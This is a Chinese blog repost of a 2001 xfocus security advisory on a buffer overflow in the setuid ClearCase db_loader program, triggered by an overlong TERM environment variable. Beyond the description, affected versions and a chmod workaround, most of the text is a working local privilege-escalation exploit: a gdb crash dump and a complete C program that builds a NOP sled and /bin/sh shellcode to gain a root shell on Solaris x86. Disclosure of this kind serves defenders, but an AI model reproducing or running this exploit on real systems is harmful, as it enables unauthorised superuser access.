【实战】ClearCase db_loader环境变量溢出漏洞

最新推荐文章于 2023-03-10 11:50:07 发布
最新推荐文章于 2023-03-10 11:50:07 发布
阅读量1.3k 收藏
点赞数
分类专栏: 溢出研究 文章标签: alignment solaris 配置管理 null buffer debugging
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freexploit/article/details/334109
版权

ClearCase db_loader环境变量溢出漏洞


创建时间:2001-11-10
文章属性:原创
文章来源:http://xfocus.org
文章提交:inburst (inburst_at_263.net)

----------------------------------
ClearCase db_loader环境变量溢出漏洞
----------------------------------

发布信息
--------

发现日期:2001年8月
公布日期:2001年11月1日
发现者:virtualcat@xfocus.org
网站:http://xfocus.org


简单描述
--------

Rational 公司推出的软件配置管理工具ClearCase主要用于Windows和Unix开发环境。ClearCase提供了全面的配置管理功能——包括版本控制、工作空间管理、建立管理和过程控制,而且无需软件开发者改变他们现有的环境、工具和工作方式。
该管理工具存在一个db_loader程序,该程序默认安装设置了suid位,但当你使用一个超长的环境变量"TERM"的时候,会导致缓冲区溢出,该漏洞可能导致发生系统越权行为。

受影响的软件版本和平台
----------------------

影响版本:ClearCase 3.2+, 4.0, 4.1, 4.2
影响系统:Linux, Solaris sparc, Solaris x86, AIX, HP, Digital, IRIX, SCO etc.


细节
----

$ TERM=`perl -e 'print "A"x550'`
$ export TERM
$ /usr/atria/etc/db_loader
Bus Error
$ gdb db_loader core -q
(no debugging symbols found)...Core was generated by `./db_loader'.
Cannot access memory at address 0xffffffffff3e1b80
#0  0xf0db8 in imsg_fputs ()
(gdb) bt
#0  0xf0db8 in imsg_fputs ()
Cannot access memory at address 0x41414179
(gdb) i reg
g0             0x0      0
g1             0x7b000  503808
g2             0x13cf84 1298308
g3             0x0      0
g4             0xf6c2c  1010732
g5             0x0      0
g6             0x0      0
g7             0x143d58 1326424
o0             0xffffffff       -1
o1             0x1      1
o2             0xffbef054       -4263852
o3             0xf0c3c  986172
o4             0xffbeed8a       -4264566
o5             0xffffffff       -1
sp             0xffbeef70       -4264080
o7             0xf0db0  986544
l0             0x41414141       1094795585
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41414141       1094795585
i7             0x41414141       1094795585
y              0x0      0
psr            0xfe801007       -25161721       icc:N---, pil:0, s:0, ps:0, et:0, cwp:7
wim            0x0      0
tbr            0x0      0
pc             0xf0db8  986552
npc            0xf0dbc  986556
fpsr           0x0      0       rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr           0x0      0
(gdb)

本地用户可以通过这一漏洞越权得到超级用户权限。

测试程序
--------

ClearCase_x86exp.c

/* Rational ClearCase TERM environment variable buffer overflow exploit
*  test it again solaris x86 7, bug found by virtualcat@xfocus.org
*  xploit by xundi@xfocus.org
*  website: http://xfocus.org
*/

#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

#define    RET_DIS            550
#define    NOP            0x90
#define    NNOP            512

#define    ENV_VAR            "TERM"

#define    USER_UPPER_MAGIC    0x08047fff

/* Shell code taken from Pablo Sor's "mailx -F" exploit code    */
char shellCode[] =
    "/xeb/x48/x9a/xff/xff/xff/xff/x07/xff/xc3/x5e/x31/xc0/x89/x46/xb4"
    "/x88/x46/xb9/x88/x46/x07/x89/x46/x0c/x31/xc0/x50/xb0/x8d/xe8/xdf"
    "/xff/xff/xff/x83/xc4/x04/x31/xc0/x50/xb0/x17/xe8/xd2/xff/xff/xff"
    "/x83/xc4/x04/x31/xc0/x50/x8d/x5e/x08/x53/x8d/x1e/x89/x5e/x08/x53"
    "/xb0/x3b/xe8/xbb/xff/xff/xff/x83/xc4/x0c/xe8/xbb/xff/xff/xff/x2f"
    "/x62/x69/x6e/x2f/x73/x68/xff/xff/xff/xff/xff/xff/xff/xff/xff";


int get_esp()
{
    __asm__("mov %esp,%eax");
}

int  getEnvAddr(const char* envPtr)
{
    int    envAddr = NULL;
    int    retCode = 0;

    char* charPtr = (char *) get_esp();

    /* Search for the starting address of the environment string for    */
    /* the specified environment variable                    */
    while((unsigned int)  charPtr < (unsigned int) USER_UPPER_MAGIC)
    {
        retCode = memcmp((unsigned char *) charPtr++, envPtr, 4);
        /* Found */
        if(retCode == 0)
        {
            envAddr = (int) (charPtr - 1);
            break;
        }
    }

    return envAddr;
}

int main(int argc, char** argv)
{

    char    buff[256] = {0};

    int*    intPtr = NULL;
    char*    buffPtr = NULL;
    char*    charPtr = NULL;

    int    retAddr = 0;
    int    retValue = 0;


    int    buffLen = 0;
    int    adjustment = 0;
    int    strLen = 0;
    int    alignment = 0;
    int    diff = 0;
    int    i;

    int shellCodeLen = strlen(shellCode);

    if(argc == 2)
    {
        adjustment = atoi(argv[1]);
    }

    buffLen = strlen(ENV_VAR) + RET_DIS + NNOP + shellCodeLen + 1;

    charPtr = getenv(ENV_VAR);

    /* Adjust the stupid alignment    */
    strLen = strlen(charPtr) + 1;
    alignment = strLen % 4;
    if(alignment != 0)
    {
        alignment = 4 - alignment;
        strLen += alignment;
    }

    alignment = buffLen % 4;
    if(alignment != 0)
    {
        alignment = 4 - alignment;
        buffLen += alignment;
    }

    retValue = getEnvAddr(ENV_VAR);

    diff = buffLen - strLen;

    retAddr = retValue - diff + strlen(ENV_VAR) + 1;

    alignment = retAddr % 4;

    if(alignment != 0)
    {
        alignment = 4 - alignment;
    }
    retAddr += RET_DIS + alignment +  adjustment;

    /* Allocate memory for the evil buffer    */
    buffPtr = (char *) malloc(buffLen);

    if(buffPtr != NULL)
    {

        strcpy(buffPtr, ENV_VAR);
        strcat(buffPtr, "=");
        charPtr = (char *) (buffPtr + strlen(buffPtr));

        /* Fill the rest of the buffer with 'A'     */
        memset(charPtr, 0x41, buffLen - strlen(buffPtr)-4);

        /* Butt in the return address            */
        intPtr = (int *) (charPtr + RET_DIS);
        *intPtr++ = retAddr;

        /* Make sure the NOPs are located word aligned     */
        charPtr = (char *) intPtr;
        charPtr += alignment;

        for(i=0; i<NNOP; i++)
        {
            *charPtr++ = NOP;
        }

        for(i=0; i<shellCodeLen; i++)
        {
            *charPtr++ = shellCode[i];
        }
        *charPtr = 0;

        putenv(buffPtr);

        printf("Jumping to 0x%.8x/n", retAddr);

        execl("/usr/atria/etc/db_loader", "xfocus", NULL);
    }
    else
    {
        printf("No more free memory!");
    }
}

/*..Thanks for all xfocus members.. especially virtualcat*/

临时解决办法
------------

# chmod a-s /usr/atria/etc/db_loader

厂商信息
--------

2001年8月已经通知厂商
厂商主页:http://www.rational.com

关于Xfocus
----------

Xfocus是一个于1998年在中国成立的非盈利的网络及系统安全组织,致力于发现网络、通信及软件硬件各方面的脆弱性并进行相关的研究。

版权所有 2001 http://xfocus.org,欢迎转载,但必须保留版权信息。

freexploit
关注
专栏目录
方式程0day MS17-010远程溢出漏洞测试
十年磨一剑,霜刃未曾试!
06-02 1万+
最近那个WannaCry勒索病毒搞的沸沸扬扬,据了解该病毒利用了方程式泄露的0day MS17-010(永恒之蓝)进行传播。 据说这个漏洞是支持winxp-win2012,测试一下这个漏洞到底如何。 一、环境: 靶机:win7 IP:192.168.4.247 攻击机:win2003 IP:192.168.4.16 反弹shell: kali IP:192.168.4.15 在攻击机中需要p...
Oracle DB sql*loader例子
ImezZ
05-09 553
sql*loader 是一个程序, 用来把 文本文件里面的数据, 导入到 Oracle 数据库里面。下面是一个简单的例子:SQL*Loader首先需要一个 控制文件test_main.ctl,内容如下:LOAD DATAINFILE *INTO TABLE test_mainFIELDS TERMINATED BY ','(ID, VALUE)BEGINDATA1,Test其中,第一行L...
方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记
captain51的博客
04-16 1万+
ETERNALBLUE :是一个0day RCE漏洞利用,影响最新的Windows 2008 R2 SERVER VIA SMB和NBT,利用SMB漏洞,攻击开放445端口的windows机器
数据库相关中间件(上)
会飞的鱼
11-23 551
数据库中间件 这里主要介绍互联网行业内有关数据库的相关中间件。数据库相关平台主要解决以下三个方面的问题: 为海量前台数据提供高性能、大容量、高可用性的访问 为数据变更的消费提供准实时的保障 高效的异地数据同步 应用层通过分表分库中间件访问数据库,包括读操作(Select)和写操作(update, insert和delete等,DDL, DCL)。写
网安学习日记-MS08-067远程溢出漏洞学习(CVE-2008-4250)
最新发布
末班车的博客
03-10 795
MS08-067远程代码执行漏洞详细利用过程与发现思路
风险类型说明和处理建议手册
tigerman20201的博客
08-20 1069
.1 Web攻击 风险描述: 主要是指常见的Web类型攻击,包括SQL注入、命令注入、代码注入、跨站脚本攻击、协议错误等,一般是由攻击人员尝试构造特殊的SQL语句、系统命令、脚本、java代码等,发送请求,来触发WEB服务器上未经发现的,或者未经修复的漏洞,然后利用这些漏洞,进行恶意行为:获取敏感数据,执行数据库操作、操作系统命令/程序代码等。 处理建议 1、首先需确认攻击源和目标主机所处网络位置,对于内网向外发起的攻击行为,建议通过对源主机进行访问限制阻止攻击行为,并检查该内部主机是否有其他
Clearcase客户端安装步骤与环境变量配置
新建一个名为CLEARCASE_PRIMARY_GROUP的变量,将其值设置为hollysys\macs_dev,这样系统就能识别用户在哪个组内,以便正确地运行Clearcase。 接下来是客户端的安装步骤: 1. 在计划的安装位置(例如c:\Program ...
Eclipse集成配置管理工具ClearCase(ccrc_for_eclipse)知识.pdf
11-13
Eclipse集成配置管理工具ClearCase (ccrc_for_eclipse) 是一种将IBM的配置管理工具ClearCase与流行的Java开发环境Eclipse相结合的方式。ClearCase是一款强大的版本控制系统,它提供了版本控制、配置管理以及软件变更...
Eclipse集成配置管理工具ClearCase(ccrc_for_eclipse).pdf
11-05
在集成ClearCase之前,首先需要确保你已经拥有Eclipse或MyEclipse的基础环境。接着,你需要下载并安装GEF运行时插件,将其添加到Eclipse的plugins和features文件夹内。安装完成后,通过Eclipse的"Help > Software ...
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
VS2017 远程调试linux出现的错误:Cannot access memory at address 0x570
热门推荐
A.A的博客
07-11 2万+
描述新建的linux默认工程#include <stdio.h>int main() { printf("hello from linux_test!\n"); return 0; }编译时没有任何问题:1>------ 已启动生成: 项目: arptools, 配置: Debug x64 ------ 1>Validating architecture 1>Validating s
db_load命令 ——生成db数据库
weixin_50196615的博客
12-26 2466
db_load命令 – 生成db数据库 db_load命令的作用是将用户信息文件转换为数据库并使用 hash 加密,如果需要保存虚拟帐号和密码的文本文件且不让被系统帐号直接调用,我们就需要使用db_load 命令生成db数据库。 # db_load -T -t hash -f /etc/vsftpd/vftpuser.txt /etc/vsftpd/vftpuser.db -T 选项-T允许应用程序能够将文本文件转译载入进数据库。由于我们之后是将虚拟用户的信息以文件方式存...
CTF-SMB信息泄露【简单易懂】
不知名白帽的博客
08-17 2850
CTF-SMB信息泄露【简单易懂】
SMB服务漏洞MS17-010渗透测试
sinat_41880528的博客
07-03 1万+
1.MS17-010漏洞简介     MS17-010是微软Windows 系统SMB协议的漏洞。由于某些请求的处理不当,Microsoft Server Message Block 1.0(SMBv1)中存在多个远程代码执行漏洞,远程Windows主机受到以下漏洞的影响:CVE-20170143,CVE-20170144,CVE-20170145,CVE-20170146,CVE-2017014...
word 代码_微软补丁日:Word/DHCP/LNK远程代码执行漏洞预警
weixin_39986896的博客
11-29 183
0x00 漏洞背景2019年8月14日微软发布的安全更新中除了RDP漏洞还涵盖了针对多个远程代码执行高危漏洞的修复。Microsoft Word远程代码执行漏洞漏洞编号CVE-2019-0585。Windows DHCP客户端远程代码执行漏洞漏洞编号CVE-2019-0736。LNK远程代码执行漏洞漏洞编号CVE-2019-1188。0x01 漏洞详情LNK远程代码执行漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值